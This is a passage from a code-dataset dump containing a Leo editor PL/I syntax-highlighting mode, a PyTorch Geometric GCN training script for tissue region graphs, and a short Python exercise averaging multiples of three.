\"keyword2\",\r\n \"call\": \"keyword1\",\r\n \"cast\": \"keyword3\",\r\n \"cdecl\": \"keyword2\",\r\n \"cds\": \"keyword3\",\r\n \"ceil\": \"keyword3\",\r\n \"cell\": \"keyword2\",\r\n \"center\": \"keyword3\",\r\n \"centerright\": \"keyword3\",\r\n \"centre\": \"keyword3\",\r\n \"centreleft\": \"keyword3\",\r\n \"centreright\": \"keyword3\",\r\n \"char\": \"keyword2\",\r\n \"character\": \"keyword2\",\r\n \"charg\": \"keyword3\",\r\n \"chargraphic\": \"keyword3\",\r\n \"chargval\": \"keyword3\",\r\n \"checkstg\": \"keyword3\",\r\n \"close\": \"keyword1\",\r\n \"cobol\": \"keyword2\",\r\n \"collate\": \"keyword3\",\r\n \"column\": \"keyword2\",\r\n \"compare\": \"keyword3\",\r\n \"complex\": \"keyword2\",\r\n \"cond\": \"keyword2\",\r\n \"condition\": \"keyword2\",\r\n \"conjg\": \"keyword3\",\r\n \"conn\": \"keyword2\",\r\n \"connected\": \"keyword2\",\r\n \"controlled\": \"keyword2\",\r\n \"conv\": \"keyword2\",\r\n \"conversion\": \"keyword2\",\r\n \"copy\": \"keyword1\",\r\n \"cos\": \"keyword3\",\r\n \"cosd\": \"keyword3\",\r\n \"cosf\": \"keyword3\",\r\n \"cosh\": \"keyword3\",\r\n \"count\": \"keyword3\",\r\n \"cplx\": \"keyword2\",\r\n \"cs\": \"keyword3\",\r\n \"cstg\": \"keyword3\",\r\n \"ctl\": \"keyword2\",\r\n \"currentsize\": \"keyword3\",\r\n \"currentstorage\": \"keyword3\",\r\n \"data\": \"keyword2\",\r\n \"datafield\": \"keyword3\",\r\n \"date\": \"keyword3\",\r\n \"datetime\": \"keyword3\",\r\n \"days\": \"keyword3\",\r\n \"daystodate\": \"keyword3\",\r\n \"daystosecs\": \"keyword3\",\r\n \"dcl\": \"keyword1\",\r\n \"dec\": \"keyword2\",\r\n \"decimal\": \"keyword2\",\r\n \"declare\": \"keyword1\",\r\n \"def\": \"keyword2\",\r\n \"default\": \"keyword1\",\r\n \"define\": \"keyword1\",\r\n \"defined\": 
\"keyword2\",\r\n \"delay\": \"keyword1\",\r\n \"delete\": \"keyword1\",\r\n \"descriptor\": \"keyword2\",\r\n \"descriptors\": \"keyword2\",\r\n \"detach\": \"keyword1\",\r\n \"dft\": \"keyword1\",\r\n \"dim\": \"keyword2\",\r\n \"dimension\": \"keyword2\",\r\n \"direct\": \"keyword2\",\r\n \"display\": \"keyword1\",\r\n \"divide\": \"keyword3\",\r\n \"do\": \"keyword1\",\r\n \"downthru\": \"keyword1\",\r\n \"e\": \"keyword2\",\r\n \"edit\": \"keyword2\",\r\n \"else\": \"keyword1\",\r\n \"empty\": \"keyword3\",\r\n \"end\": \"keyword1\",\r\n \"endfile\": \"keyword2\",\r\n \"endpage\": \"keyword2\",\r\n \"entry\": \"keyword1\",\r\n \"entryaddr\": \"keyword3\",\r\n \"env\": \"keyword2\",\r\n \"environment\": \"keyword2\",\r\n \"epsilon\": \"keyword3\",\r\n \"erfc\": \"keyword3\",\r\n \"error\": \"keyword2\",\r\n \"exclusive\": \"keyword2\",\r\n \"exit\": \"keyword1\",\r\n \"exp\": \"keyword3\",\r\n \"expf\": \"keyword3\",\r\n \"exponent\": \"keyword3\",\r\n \"exports\": \"keyword2\",\r\n \"ext\": \"keyword2\",\r\n \"external\": \"keyword2\",\r\n \"f\": \"keyword2\",\r\n \"fetch\": \"keyword1\",\r\n \"fetchable\": \"keyword2\",\r\n \"file\": \"keyword2\",\r\n \"fileddint\": \"keyword3\",\r\n \"fileddtest\": \"keyword3\",\r\n \"fileddword\": \"keyword3\",\r\n \"fileid\": \"keyword3\",\r\n \"fileopen\": \"keyword3\",\r\n \"fileread\": \"keyword3\",\r\n \"fileseek\": \"keyword3\",\r\n \"filetell\": \"keyword3\",\r\n \"filewrite\": \"keyword3\",\r\n \"finish\": \"keyword2\",\r\n \"first\": \"keyword3\",\r\n \"fixed\": \"keyword2\",\r\n \"fixedoverflow\": \"keyword2\",\r\n \"float\": \"keyword2\",\r\n \"floor\": \"keyword3\",\r\n \"flush\": \"keyword1\",\r\n \"fofl\": \"keyword2\",\r\n \"format\": \"keyword2\",\r\n \"fortran\": \"keyword2\",\r\n \"free\": \"keyword1\",\r\n \"from\": \"keyword1\",\r\n \"fromalien\": \"keyword2\",\r\n \"g\": \"keyword2\",\r\n \"gamma\": \"keyword3\",\r\n \"generic\": \"keyword2\",\r\n \"get\": \"keyword1\",\r\n \"getenv\": \"keyword3\",\r\n \"go\": \"keyword1\",\r\n \"goto\": \"keyword1\",\r\n \"graphic\": \"keyword2\",\r\n \"gx\": \"keyword2\",\r\n \"handle\": \"keyword2\",\r\n \"hbound\": \"keyword3\",\r\n \"hex\": \"keyword3\",\r\n \"hexadec\": \"keyword2\",\r\n \"heximage\": \"keyword3\",\r\n \"high\": \"keyword3\",\r\n \"huge\": \"keyword3\",\r\n \"iand\": \"keyword3\",\r\n \"ieee\": \"keyword2\",\r\n \"ieor\": \"keyword3\",\r\n \"if\": \"keyword1\",\r\n \"ignore\": \"keyword1\",\r\n \"imag\": \"keyword3\",\r\n \"imported\": \"keyword2\",\r\n \"index\": \"keyword3\",\r\n \"init\": \"keyword2\",\r\n \"initial\": \"keyword2\",\r\n \"inline\": \"keyword2\",\r\n \"inot\": \"keyword3\",\r\n \"input\": \"keyword2\",\r\n \"inter\": \"keyword2\",\r\n \"internal\": \"keyword2\",\r\n \"into\": \"keyword1\",\r\n \"invalidop\": \"keyword2\",\r\n \"ior\": \"keyword3\",\r\n \"irred\": \"keyword2\",\r\n \"irreducible\": \"keyword2\",\r\n \"isigned\": \"keyword3\",\r\n \"isll\": \"keyword3\",\r\n \"ismain\": \"keyword3\",\r\n \"isrl\": \"keyword3\",\r\n \"iterate\": \"keyword1\",\r\n \"iunsigned\": \"keyword3\",\r\n \"key\": \"keyword1\",\r\n \"keyed\": \"keyword2\",\r\n \"keyfrom\": \"keyword1\",\r\n \"keyto\": \"keyword1\",\r\n \"l\": \"keyword2\",\r\n \"label\": \"keyword2\",\r\n \"last\": \"keyword3\",\r\n \"lbound\": \"keyword3\",\r\n \"leave\": \"keyword1\",\r\n \"left\": \"keyword3\",\r\n \"length\": \"keyword3\",\r\n \"like\": \"keyword2\",\r\n \"limited\": \"keyword2\",\r\n \"line\": \"keyword1\",\r\n \"lineno\": \"keyword3\",\r\n \"linesize\": \"keyword2\",\r\n 
\"linkage\": \"keyword2\",\r\n \"list\": \"keyword2\",\r\n \"littleendian\": \"keyword2\",\r\n \"loc\": \"keyword3\",\r\n \"locate\": \"keyword1\",\r\n \"location\": \"keyword3\",\r\n \"log\": \"keyword3\",\r\n \"log10\": \"keyword3\",\r\n \"log10f\": \"keyword3\",\r\n \"log2\": \"keyword3\",\r\n \"logf\": \"keyword3\",\r\n \"loggamma\": \"keyword3\",\r\n \"loop\": \"keyword1\",\r\n \"low\": \"keyword3\",\r\n \"lower2\": \"keyword3\",\r\n \"lowercase\": \"keyword3\",\r\n \"m\": \"keyword2\",\r\n \"main\": \"keyword2\",\r\n \"max\": \"keyword3\",\r\n \"maxexp\": \"keyword3\",\r\n \"maxlength\": \"keyword3\",\r\n \"min\": \"keyword3\",\r\n \"minexp\": \"keyword3\",\r\n \"mod\": \"keyword3\",\r\n \"mpstr\": \"keyword3\",\r\n \"multiply\": \"keyword3\",\r\n \"name\": \"keyword1\",\r\n \"native\": \"keyword2\",\r\n \"new\": \"keyword3\",\r\n \"nocharg\": \"keyword2\",\r\n \"nochargraphic\": \"keyword2\",\r\n \"nodescriptor\": \"keyword2\",\r\n \"noexecops\": \"keyword2\",\r\n \"nomap\": \"keyword2\",\r\n \"nomapin\": \"keyword2\",\r\n \"nomapout\": \"keyword2\",\r\n \"nonasgn\": \"keyword2\",\r\n \"nonassignable\": \"keyword2\",\r\n \"nonconn\": \"keyword2\",\r\n \"nonconnected\": \"keyword2\",\r\n \"nonnative\": \"keyword2\",\r\n \"nonvar\": \"keyword2\",\r\n \"nonvarying\": \"keyword2\",\r\n \"normal\": \"keyword2\",\r\n \"null\": \"keyword3\",\r\n \"offestadd\": \"keyword3\",\r\n \"offestdiff\": \"keyword3\",\r\n \"offestsubtract\": \"keyword3\",\r\n \"offestvalue\": \"keyword3\",\r\n \"offset\": \"keyword2\",\r\n \"ofl\": \"keyword2\",\r\n \"omitted\": \"keyword3\",\r\n \"on\": \"keyword1\",\r\n \"onchar\": \"keyword3\",\r\n \"oncode\": \"keyword3\",\r\n \"oncondid\": \"keyword3\",\r\n \"oncondond\": \"keyword3\",\r\n \"oncount\": \"keyword3\",\r\n \"onfile\": \"keyword3\",\r\n \"ongsource\": \"keyword3\",\r\n \"onkey\": \"keyword3\",\r\n \"onloc\": \"keyword3\",\r\n \"onsource\": \"keyword3\",\r\n \"onsubcode\": \"keyword3\",\r\n \"onwchar\": \"keyword3\",\r\n \"onwsource\": \"keyword3\",\r\n \"open\": \"keyword1\",\r\n \"optional\": \"keyword2\",\r\n \"options\": \"keyword2\",\r\n \"optlink\": \"keyword2\",\r\n \"order\": \"keyword2\",\r\n \"ordinal\": \"keyword1\",\r\n \"ordinalname\": \"keyword3\",\r\n \"ordinalpred\": \"keyword3\",\r\n \"ordinalsucc\": \"keyword3\",\r\n \"other\": \"keyword1\",\r\n \"otherwise\": \"keyword1\",\r\n \"output\": \"keyword2\",\r\n \"overflow\": \"keyword2\",\r\n \"p\": \"keyword2\",\r\n \"package\": \"keyword1\",\r\n \"packagename\": \"keyword3\",\r\n \"page\": \"keyword1\",\r\n \"pageno\": \"keyword3\",\r\n \"pagesize\": \"keyword2\",\r\n \"parameter\": \"keyword2\",\r\n \"pic\": \"keyword2\",\r\n \"picture\": \"keyword2\",\r\n \"places\": \"keyword3\",\r\n \"plianc\": \"keyword3\",\r\n \"pliascii\": \"keyword3\",\r\n \"plickpt\": \"keyword3\",\r\n \"plidelete\": \"keyword3\",\r\n \"plidump\": \"keyword3\",\r\n \"pliebcdic\": \"keyword3\",\r\n \"plifill\": \"keyword3\",\r\n \"plifree\": \"keyword3\",\r\n \"plimove\": \"keyword3\",\r\n \"pliover\": \"keyword3\",\r\n \"plirest\": \"keyword3\",\r\n \"pliretc\": \"keyword3\",\r\n \"pliretv\": \"keyword3\",\r\n \"plisaxa\": \"keyword3\",\r\n \"plisaxb\": \"keyword3\",\r\n \"plisrta\": \"keyword3\",\r\n \"plisrtb\": \"keyword3\",\r\n \"plisrtc\": \"keyword3\",\r\n \"plisrtd\": \"keyword3\",\r\n \"pointer\": \"keyword2\",\r\n \"pointeradd\": \"keyword3\",\r\n \"pointerdiff\": \"keyword3\",\r\n \"pointersubtract\": \"keyword3\",\r\n \"pointervalue\": \"keyword3\",\r\n \"poly\": \"keyword3\",\r\n \"pos\": 
\"keyword2\",\r\n \"position\": \"keyword2\",\r\n \"prec\": \"keyword2\",\r\n \"precision\": \"keyword2\",\r\n \"pred\": \"keyword3\",\r\n \"present\": \"keyword3\",\r\n \"print\": \"keyword2\",\r\n \"proc\": \"keyword1\",\r\n \"procedure\": \"keyword1\",\r\n \"procedurename\": \"keyword3\",\r\n \"procname\": \"keyword3\",\r\n \"prod\": \"keyword3\",\r\n \"ptr\": \"keyword2\",\r\n \"ptradd\": \"keyword3\",\r\n \"ptrdiff\": \"keyword3\",\r\n \"ptrsubtract\": \"keyword3\",\r\n \"ptrvalue\": \"keyword3\",\r\n \"put\": \"keyword1\",\r\n \"putenv\": \"keyword3\",\r\n \"r\": \"keyword2\",\r\n \"radix\": \"keyword3\",\r\n \"raise\": \"keyword3\",\r\n \"random\": \"keyword3\",\r\n \"range\": \"keyword2\",\r\n \"rank\": \"keyword3\",\r\n \"read\": \"keyword1\",\r\n \"real\": \"keyword2\",\r\n \"record\": \"keyword2\",\r\n \"recursive\": \"keyword2\",\r\n \"red\": \"keyword2\",\r\n \"reducible\": \"keyword2\",\r\n \"reentrant\": \"keyword2\",\r\n \"refer\": \"keyword2\",\r\n \"release\": \"keyword1\",\r\n \"rem\": \"keyword3\",\r\n \"reorder\": \"keyword2\",\r\n \"repattern\": \"keyword3\",\r\n \"repeat\": \"keyword1\",\r\n \"reply\": \"keyword1\",\r\n \"reserved\": \"keyword2\",\r\n \"reserves\": \"keyword2\",\r\n \"resignal\": \"keyword1\",\r\n \"respec\": \"keyword3\",\r\n \"retcode\": \"keyword2\",\r\n \"return\": \"keyword1\",\r\n \"returns\": \"keyword2\",\r\n \"reverse\": \"keyword3\",\r\n \"revert\": \"keyword1\",\r\n \"rewrite\": \"keyword1\",\r\n \"right\": \"keyword3\",\r\n \"round\": \"keyword3\",\r\n \"samekey\": \"keyword3\",\r\n \"scale\": \"keyword3\",\r\n \"search\": \"keyword3\",\r\n \"searchr\": \"keyword3\",\r\n \"secs\": \"keyword3\",\r\n \"secstodate\": \"keyword3\",\r\n \"secstodays\": \"keyword3\",\r\n \"select\": \"keyword1\",\r\n \"seql\": \"keyword2\",\r\n \"sequential\": \"keyword2\",\r\n \"set\": \"keyword1\",\r\n \"sign\": \"keyword3\",\r\n \"signal\": \"keyword1\",\r\n \"signed\": \"keyword3\",\r\n \"sin\": \"keyword3\",\r\n \"sind\": \"keyword3\",\r\n \"sinf\": \"keyword3\",\r\n \"sinh\": \"keyword3\",\r\n \"size\": \"keyword3\",\r\n \"skip\": \"keyword1\",\r\n \"snap\": \"keyword1\",\r\n \"sourcefile\": \"keyword3\",\r\n \"sourceline\": \"keyword3\",\r\n \"sqrt\": \"keyword3\",\r\n \"sqrtf\": \"keyword3\",\r\n \"static\": \"keyword2\",\r\n \"stdcall\": \"keyword2\",\r\n \"stg\": \"keyword3\",\r\n \"stop\": \"keyword1\",\r\n \"storage\": \"keyword3\",\r\n \"stream\": \"keyword2\",\r\n \"strg\": \"keyword2\",\r\n \"string\": \"keyword3\",\r\n \"stringrange\": \"keyword2\",\r\n \"stringsize\": \"keyword2\",\r\n \"structure\": \"keyword1\",\r\n \"strz\": \"keyword2\",\r\n \"subrg\": \"keyword2\",\r\n \"subscriptrange\": \"keyword2\",\r\n \"substr\": \"keyword3\",\r\n \"subtract\": \"keyword3\",\r\n \"succ\": \"keyword3\",\r\n \"sum\": \"keyword3\",\r\n \"sysnull\": \"keyword3\",\r\n \"system\": \"keyword2\",\r\n \"tally\": \"keyword3\",\r\n \"tan\": \"keyword3\",\r\n \"tand\": \"keyword3\",\r\n \"tanf\": \"keyword3\",\r\n \"tanh\": \"keyword3\",\r\n \"task\": \"keyword2\",\r\n \"then\": \"keyword1\",\r\n \"thread\": \"keyword1\",\r\n \"threadid\": \"keyword3\",\r\n \"time\": \"keyword3\",\r\n \"tiny\": \"keyword3\",\r\n \"title\": \"keyword2\",\r\n \"to\": \"keyword1\",\r\n \"translate\": \"keyword3\",\r\n \"transmit\": \"keyword2\",\r\n \"trim\": \"keyword3\",\r\n \"trunc\": \"keyword3\",\r\n \"tstack\": \"keyword1\",\r\n \"type\": \"keyword3\",\r\n \"ufl\": \"keyword2\",\r\n \"unal\": \"keyword2\",\r\n \"unaligned\": \"keyword2\",\r\n \"unallocated\": \"keyword3\",\r\n 
\"unbuf\": \"keyword2\",\r\n \"unbuffered\": \"keyword2\",\r\n \"undefinedfile\": \"keyword2\",\r\n \"underflow\": \"keyword2\",\r\n \"undf\": \"keyword2\",\r\n \"union\": \"keyword2\",\r\n \"unlock\": \"keyword1\",\r\n \"unsigned\": \"keyword2\",\r\n \"unspec\": \"keyword3\",\r\n \"until\": \"keyword1\",\r\n \"update\": \"keyword2\",\r\n \"uppercase\": \"keyword3\",\r\n \"upthru\": \"keyword1\",\r\n \"valid\": \"keyword3\",\r\n \"validdate\": \"keyword3\",\r\n \"value\": \"keyword2\",\r\n \"var\": \"keyword2\",\r\n \"varglist\": \"keyword3\",\r\n \"vargsizer\": \"keyword3\",\r\n \"variable\": \"keyword2\",\r\n \"varying\": \"keyword2\",\r\n \"varyingz\": \"keyword2\",\r\n \"varz\": \"keyword2\",\r\n \"verify\": \"keyword3\",\r\n \"verifyr\": \"keyword3\",\r\n \"wait\": \"keyword1\",\r\n \"wchar\": \"keyword2\",\r\n \"wcharval\": \"keyword3\",\r\n \"weekday\": \"keyword3\",\r\n \"when\": \"keyword1\",\r\n \"whigh\": \"keyword3\",\r\n \"while\": \"keyword1\",\r\n \"widechar\": \"keyword2\",\r\n \"winmain\": \"keyword2\",\r\n \"wlow\": \"keyword3\",\r\n \"write\": \"keyword1\",\r\n \"wx\": \"keyword2\",\r\n \"x\": \"keyword2\",\r\n \"xn\": \"keyword2\",\r\n \"xu\": \"keyword2\",\r\n \"y4date\": \"keyword3\",\r\n \"y4julian\": \"keyword3\",\r\n \"y4year\": \"keyword3\",\r\n \"zdiv\": \"keyword2\",\r\n \"zerodivide\": \"keyword2\",\r\n}\r\n\r\n# Dictionary of keywords dictionaries for pl1 mode.\r\nkeywordsDictDict = {\r\n \"pl1_main\": pl1_main_keywords_dict,\r\n}\r\n\r\n# Rules for pl1_main ruleset.\r\n\r\ndef pl1_rule0(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"comment1\", begin=\"/*\", end=\"*/\")\r\n\r\ndef pl1_rule1(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"literal1\", begin=\"'\", end=\"'\")\r\n\r\ndef pl1_rule2(colorer, s, i):\r\n return colorer.match_span(s, i, kind=\"literal1\", begin=\"\\\"\", end=\"\\\"\")\r\n\r\ndef pl1_rule3(colorer, s, i):\r\n return colorer.match_eol_span_regexp(s, i, kind=\"keyword2\", regexp=\"\\\\* *process\",\r\n at_line_start=True)\r\n\r\ndef pl1_rule4(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"=\")\r\n\r\ndef pl1_rule5(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"+\")\r\n\r\ndef pl1_rule6(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"-\")\r\n\r\ndef pl1_rule7(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"*\")\r\n\r\ndef pl1_rule8(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"/\")\r\n\r\ndef pl1_rule9(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\">\")\r\n\r\ndef pl1_rule10(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"<\")\r\n\r\ndef pl1_rule11(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"^\")\r\n\r\ndef pl1_rule12(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"&\")\r\n\r\ndef pl1_rule13(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"|\")\r\n\r\ndef pl1_rule14(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\".\")\r\n\r\ndef pl1_rule15(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\",\")\r\n\r\ndef pl1_rule16(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\";\")\r\n\r\ndef pl1_rule17(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", 
seq=\")\")\r\n\r\ndef pl1_rule18(colorer, s, i):\r\n return colorer.match_plain_seq(s, i, kind=\"operator\", seq=\"(\")\r\n\r\ndef pl1_rule19(colorer, s, i):\r\n return colorer.match_mark_previous(s, i, kind=\"label\", pattern=\":\",\r\n at_whitespace_end=True,\r\n exclude_match=True)\r\n\r\ndef pl1_rule20(colorer, s, i):\r\n return colorer.match_mark_previous(s, i, kind=\"function\", pattern=\"(\",\r\n exclude_match=True)\r\n\r\ndef pl1_rule21(colorer, s, i):\r\n return colorer.match_keywords(s, i)\r\n\r\n# Rules dict for pl1_main ruleset.\r\nrulesDict1 = {\r\n \"\\\"\": [pl1_rule2,],\r\n \"%\": [pl1_rule21,],\r\n \"&\": [pl1_rule12,],\r\n \"'\": [pl1_rule1,],\r\n \"(\": [pl1_rule18, pl1_rule20,],\r\n \")\": [pl1_rule17,],\r\n \"*\": [pl1_rule3, pl1_rule7,],\r\n \"+\": [pl1_rule5,],\r\n \",\": [pl1_rule15,],\r\n \"-\": [pl1_rule6,],\r\n \".\": [pl1_rule14,],\r\n \"/\": [pl1_rule0, pl1_rule8,],\r\n \"0\": [pl1_rule21,],\r\n \"1\": [pl1_rule21,],\r\n \"2\": [pl1_rule21,],\r\n \"3\": [pl1_rule21,],\r\n \"4\": [pl1_rule21,],\r\n \"5\": [pl1_rule21,],\r\n \"6\": [pl1_rule21,],\r\n \"7\": [pl1_rule21,],\r\n \"8\": [pl1_rule21,],\r\n \"9\": [pl1_rule21,],\r\n \":\": [pl1_rule19,],\r\n \";\": [pl1_rule16,],\r\n \"<\": [pl1_rule10,],\r\n \"=\": [pl1_rule4,],\r\n \">\": [pl1_rule9,],\r\n \"@\": [pl1_rule21,],\r\n \"A\": [pl1_rule21,],\r\n \"B\": [pl1_rule21,],\r\n \"C\": [pl1_rule21,],\r\n \"D\": [pl1_rule21,],\r\n \"E\": [pl1_rule21,],\r\n \"F\": [pl1_rule21,],\r\n \"G\": [pl1_rule21,],\r\n \"H\": [pl1_rule21,],\r\n \"I\": [pl1_rule21,],\r\n \"J\": [pl1_rule21,],\r\n \"K\": [pl1_rule21,],\r\n \"L\": [pl1_rule21,],\r\n \"M\": [pl1_rule21,],\r\n \"N\": [pl1_rule21,],\r\n \"O\": [pl1_rule21,],\r\n \"P\": [pl1_rule21,],\r\n \"Q\": [pl1_rule21,],\r\n \"R\": [pl1_rule21,],\r\n \"S\": [pl1_rule21,],\r\n \"T\": [pl1_rule21,],\r\n \"U\": [pl1_rule21,],\r\n \"V\": [pl1_rule21,],\r\n \"W\": [pl1_rule21,],\r\n \"X\": [pl1_rule21,],\r\n \"Y\": [pl1_rule21,],\r\n \"Z\": [pl1_rule21,],\r\n \"^\": [pl1_rule11,],\r\n \"a\": [pl1_rule21,],\r\n \"b\": [pl1_rule21,],\r\n \"c\": [pl1_rule21,],\r\n \"d\": [pl1_rule21,],\r\n \"e\": [pl1_rule21,],\r\n \"f\": [pl1_rule21,],\r\n \"g\": [pl1_rule21,],\r\n \"h\": [pl1_rule21,],\r\n \"i\": [pl1_rule21,],\r\n \"j\": [pl1_rule21,],\r\n \"k\": [pl1_rule21,],\r\n \"l\": [pl1_rule21,],\r\n \"m\": [pl1_rule21,],\r\n \"n\": [pl1_rule21,],\r\n \"o\": [pl1_rule21,],\r\n \"p\": [pl1_rule21,],\r\n \"q\": [pl1_rule21,],\r\n \"r\": [pl1_rule21,],\r\n \"s\": [pl1_rule21,],\r\n \"t\": [pl1_rule21,],\r\n \"u\": [pl1_rule21,],\r\n \"v\": [pl1_rule21,],\r\n \"w\": [pl1_rule21,],\r\n \"x\": [pl1_rule21,],\r\n \"y\": [pl1_rule21,],\r\n \"z\": [pl1_rule21,],\r\n \"|\": [pl1_rule13,],\r\n}\r\n\r\n# x.rulesDictDict for pl1 mode.\r\nrulesDictDict = {\r\n \"pl1_main\": rulesDict1,\r\n}\r\n\r\n# Import dict for pl1 mode.\r\nimportDict = {}\r\n","repo_name":"leo-editor/leo-editor","sub_path":"leo/modes/pl1.py","file_name":"pl1.py","file_ext":"py","file_size_in_byte":19511,"program_lang":"python","lang":"en","doc_type":"code","stars":1414,"dataset":"github-code","pt":"35"} +{"seq_id":"5870304414","text":"import os.path as osp\nimport argparse\nimport numpy as np \nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.datasets import Planetoid\n\nimport torch_geometric.transforms as T\nfrom torch_geometric.nn import GCNConv, ChebConv # noqa\nfrom torch_geometric.data import Dataset, download_url\n\nfrom utils2 import load_data_adjacency_n_greatest_clusters\n\nfrom torch_geometric.data 
import Data, DataLoader\nimport matplotlib.pyplot as plt\n# roi = 'BRAC4002.3c_ROI1_MRTX.'\n\n# S, features , labels , edge_index , edge_weight=load_data_adjacency_n_greatest_clusters(roi)\n\n# edge_index = torch.LongTensor(edge_index)\n\n# data_list = [Data(features,edge_index=edge_index,edge_attr=edge_weight,y=labels)]\n# data= data_list[0]\n\n\n# n = labels.shape[0]\n\n# idx_train = range((int(np.floor(0.7*n)))) \n# idx_val = range((int(np.floor(0.7*n))), (int(np.floor(0.8*n))))\n# idx_test = range((int(np.floor(0.8*n))), (int(np.floor(1*n))))\n\n# train_mask = torch.tensor([i in idx_train for i in range(n)])\n# val_mask = torch.tensor([i in idx_val for i in range(n)])\n# test_mask = torch.tensor([i in idx_test for i in range(n)])\n\n# data.train_mask = train_mask\n# data.val_mask = val_mask\n# data.test_mask = test_mask\n\n# print(data_list)\n# data.num_classes= len(labels.unique())\n# print(data.num_classes)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(data.num_features, 64, cached=True\n )\n self.conv2 = GCNConv(64, data.num_classes, cached=True\n )\n # self.conv1 = ChebConv(data.num_features, 16, K=2)\n # self.conv2 = ChebConv(16, data.num_features, K=2)\n\n def forward(self):\n x, edge_index, edge_weight = data.x, data.edge_index, data.edge_attr\n x = F.relu(self.conv1(x.float(), edge_index, edge_weight))\n x = F.dropout(x, training=self.training)\n x = self.conv2(x.float(), edge_index, edge_weight)\n return F.log_softmax(x, dim=1)\n\n\n\n\ndef train():\n model.train()\n optimizer.zero_grad()\n F.nll_loss(model()[data.train_mask], data.y[data.train_mask]).backward()\n optimizer.step()\n\n\n@torch.no_grad()\ndef test():\n model.eval()\n logits, accs = model(), []\n for _, mask in data('train_mask', 'val_mask', 'test_mask'):\n pred = logits[mask].max(1)[1]\n acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()\n accs.append(acc)\n return accs\n\n\nrois = ['BRAC3495.3f_ROI1_Cont_crop1.', 'BRAC3495.3f_ROI1_Cont_crop2.',\n 'BRAC3326.4e_ROI1_Cont_crop1.', 'BRAC3438.6f_ROI1_Cont.', 'BRAC3438.6f_ROI2_Cont.', 'BRAC3438.6f_ROI3_Cont.', 'BRAC3529.2d_ROI1_MRTX.', 'BRAC4002.3c_ROI2_MRTX_crop1.', 'BRAC4002.3c_ROI2_MRTX_crop2.', 'BRAC4002.3c_ROI3_MRTX.', 'BRAC3529.2b_ROI1_MRTX_crop2.', 'BRAC4002.3c_ROI1_MRTX.'][:6]\n\nfor roi in rois:\n print(f\"ROI: {roi}\")\n S, features , labels , edge_index , edge_weight=load_data_adjacency_n_greatest_clusters(roi,n_clusters=15)\n edge_index = torch.LongTensor(edge_index)\n\n data_list = [Data(features,edge_index=edge_index,edge_attr=edge_weight,y=labels)]\n data= data_list[0]\n n = labels.shape[0]\n\n idx_train = range((int(np.floor(0.7*n)))) \n idx_val = range((int(np.floor(0.7*n))), (int(np.floor(0.8*n))))\n idx_test = range((int(np.floor(0.8*n))), (int(np.floor(1*n))))\n\n train_mask = torch.tensor([i in idx_train for i in range(n)])\n val_mask = torch.tensor([i in idx_val for i in range(n)])\n test_mask = torch.tensor([i in idx_test for i in range(n)])\n\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n\n # print(data_list)\n data.num_classes= len(labels.unique())\n # print(data.num_classes)\n\n values = []\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model, data = Net().to(device), data.to(device)\n # print(data.edge_index)\n\n # print(data.edge_index.shape)\n # print(type(data.edge_index[0][0]))\n\n\n optimizer = torch.optim.Adam([\n dict(params=model.conv1.parameters(), weight_decay=5e-4),\n 
dict(params=model.conv2.parameters(), weight_decay=0)\n ], lr=0.01) # Only perform weight-decay on first convolution.\n\n\n best_val_acc = test_acc = 0\n for epoch in range(1, 100):\n train()\n train_acc, val_acc, tmp_test_acc = test()\n values.append(train_acc)\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n test_acc = tmp_test_acc\n log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'\n print(log.format(epoch, train_acc, best_val_acc, test_acc))\n\n\n\n plt.plot(values)\n plt.xlabel('Epochs')\n plt.ylabel("Accuracy")\n plt.title(f"ROI: {roi}")\n plt.savefig(f'stolen/15 largest clusters - ROI: {roi}, (ELU,Sigmoid,ELU,SM), Test Accuracy: {test_acc}.png')\n plt.clf()","repo_name":"mkonchwalla/geogcn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"41298397837","text":"\"\"\"\nTask 7. Segment\nWhat needs to be done\n\nWrite a program that reads two numbers a and b from the keyboard, then computes and prints to the console the arithmetic\nmean of all numbers in the segment [a; b] that are multiples of 3.\n\"\"\"\n\nnum1 = int(input('Enter the first number: '))\nnum2 = int(input('Enter the second number: '))\nsumm_numbers, count = 0, 0\nfor number in range(num1, num2 + 1):\n    if number % 3 == 0:\n        summ_numbers += number\n        count += 1\nprint('Arithmetic mean: ', summ_numbers / count)\n","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 7/Домашнее задание/task 7.py","file_name":"task 7.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
